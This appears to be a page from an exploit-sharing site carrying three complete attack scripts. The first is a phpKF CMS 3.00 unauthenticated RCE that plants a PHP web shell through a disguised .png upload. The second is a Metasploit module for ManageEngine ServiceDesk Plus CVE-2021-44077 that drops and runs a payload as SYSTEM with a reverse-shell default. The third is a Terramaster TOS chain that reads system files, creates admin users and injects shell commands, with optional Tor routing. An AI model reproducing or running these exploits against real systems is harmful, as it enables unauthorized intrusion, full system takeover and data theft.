Latest exploits :: CodePwn

<pre><code># Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated) # Date: 18/12/2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.phpkf.com/ # Software Link: https://www.phpkf.com/indirme.php # Version: 3.00 # Category: Webapps # Tested on: Linux/Windows # phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more. # Contains an endpoint that allows remote access # Necessary checks are not made in the file upload mechanism, only the file extension is checked # The file with the extension ".png" can be uploaded and the extension can be changed. # Example: python3 exploit.py -u http://example.com # python3 exploit.py -u http://example.com -l admin -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse import json def main(): parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=False) parser.add_argument('-p', '--password', type=str, required=False) args = parser.parse_args() print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: if args.login == None and args.password == None: create_user(args) else: login_user(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def create_user(args): print("[*] Create User!\n") sleep(2) url = args.host + "/phpkf-bilesenler/kayit_yap.php" headers = { "Origin": args.host, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Referer": "http://fuzzing.com/uye-kayit.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "oturum": '', "kullanici_adi": "evil", "sifre": "Evil123", "sifre2": "Evil123", "posta": "evil@localhost.com", "kosul": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=True) args.login = ("evil") args.password = ("Evil123") print("[+] " + args.login + ":" + args.password + "\n") sleep(2) login_user(args) def login_user(args): url = args.host + "/uye-giris.php" headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/uye-giris.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "git": args.host + "/index.php", "kullanici_adi": args.login, "sifre": args.password, "hatirla": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=False) token = response.cookies.get("kullanici_kimlik") if (token != None): print("[!] Login Success!\n") sleep(2) upload_evil(args, token) else: if args.login == "evil" and args.password == "Evil123": print("[!] Unauthorized user!\n") print("[!] manually add a user and try again\n") print("[!] Go to link " + args.host + "/uye-kayit.php\n") print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'") sleep(2) else: print("[!] Unauthorized user!\n") sleep(2) def upload_evil(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "VERICEK": "", "DOSYA-ADI": "evil.png", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>" response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "yuklendi"): print("[!] Upload Success!\n") sleep(2) change_name(args, token) else: print("[!] Upload Failed!\n") sleep(2) def change_name(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "yenidenadlandir": "evil.png|evil.php", "vericek": "/" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "Name successfully changed..."): print("[!] Change Name evil.php!\n") sleep(2) find_dict(args, token) else: print("[!] Change Failed!\n") sleep(2) def find_dict(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "vericek": "/", "dds": "0" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "You can not upload files!"): print("[!] File not found!\n") sleep(2) else: print("[!] Find Vuln File!\n") sleep(2) soup = BeautifulSoup(response.text, 'html.parser') path = soup.find("div").contents[1].replace(" ", "") exploit(args, path) def exploit(args, path): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + path + "evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077', 'Description' => %q{ This module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build. }, 'Author' => [ # Discovered by unknown threat actors 'wvu', # Analysis and exploit 'Y4er' # Additional confirmation ], 'References' => [ ['CVE', '2021-44077'], ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'], ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'], ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'], ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'], ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'], ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup ], 'DisclosureDate' => '2021-09-16', 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Windows Dropper', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8080, 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians') ) unless res return CheckCode::Unknown('Target failed to respond to check.') end # NOTE: /RestAPI/ImportTechnicians was removed after build 11303 unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]') return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.') end CheckCode::Appears('/RestAPI/ImportTechnicians is present.') end def exploit upload_msiexec execute_msiexec end def upload_msiexec print_status('Uploading msiexec.exe') form = Rex::MIME::Message.new form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"') form.add_part(generate_payload_exe, 'application/octet-stream', 'binary', 'form-data; name="theFile"; filename="msiexec.exe"') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'), 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'data' => form.to_s ) unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title') fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe') end print_good('Successfully uploaded msiexec.exe') end def execute_msiexec print_status('Executing msiexec.exe') # This endpoint "won't" return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'), 'vars_post' => { 'execute' => 's247AgentInstallationProcess' } }, 0) end # XXX: FileDropper dies a miserable death if the file is in use def on_new_session(_session) super # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7 print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe") end end </code></pre>

<pre><code>#/bin/env python """ Product: Terramaster F4-210, Terramaster F2-210 Version: TOS 4.2.X (4.2.15-2107141517) Author: n0tme (thatsn0tmysite) Description: Chain from unauthenticated to root via session crafting. """ import urllib3 import requests import json import argparse import hashlib import time import os TARGET = None MAC_ADDRESS = None PWD = None TIMESTAMP = None def tos_encrypt_str(toencrypt): key = MAC_ADDRESS[6:] return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest() def user_session(session, username): session.cookies.clear() cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)} if username == "guest": cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")} for name,value in cookies.items(): session.cookies[name] = value def download(session, path, save_as=None): user_session(session, "guest") r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path}) filename = os.path.basename(path) if save_as is not None: filename = save_as with open(filename, "wb") as file: file.write(r.content) def get_admin_users(session): download(session, "/etc/group", save_as="/tmp/terramaster_group") with open("/tmp/terramaster_group", "r") as groups: for line in groups: line = line.strip() fields = line.split(':') if fields[0] == "admin": users = fields[3].split(",") os.remove("/tmp/terramaster_group") return users if __name__ == '__main__': p = argparse.ArgumentParser() p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)") p.add_argument("--cmd", dest="cmd", help="Command to run", default="id") p.add_argument("-d", "--download", dest="download", help="Only download file", default=None) p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None) p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None) p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR") p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)") args = p.parse_args() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET = args.target s = requests.Session() if args.tor: s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"} s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"}) r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS") try: j = r.json() PWD = j["data"]["PWD"] MAC_ADDRESS = j["data"]["ADDR"] except KeyError: exit(1) TIMESTAMP = str(int(time.time())) s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP}) s.headers.update({"authorization": PWD}) if args.download != None: download(s, args.download, save_as=args.save_as) exit(0) #RCEs RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23", f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND for admin in get_admin_users(s): user_session(s, admin) if args.create != None: user, password = args.create.split(":") groups = json.dumps(["allusers", "admin"]) r=s.post(f"{TARGET}/module/api.php?mobile/__construct") r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""}) if "create user successful!" in str(r.content, "utf8"): print(r.content) break continue r = s.get(RCEs[args.rce]) content = str(r.content, "utf-8") if "" not in content: print(content) exit(0) </code></pre>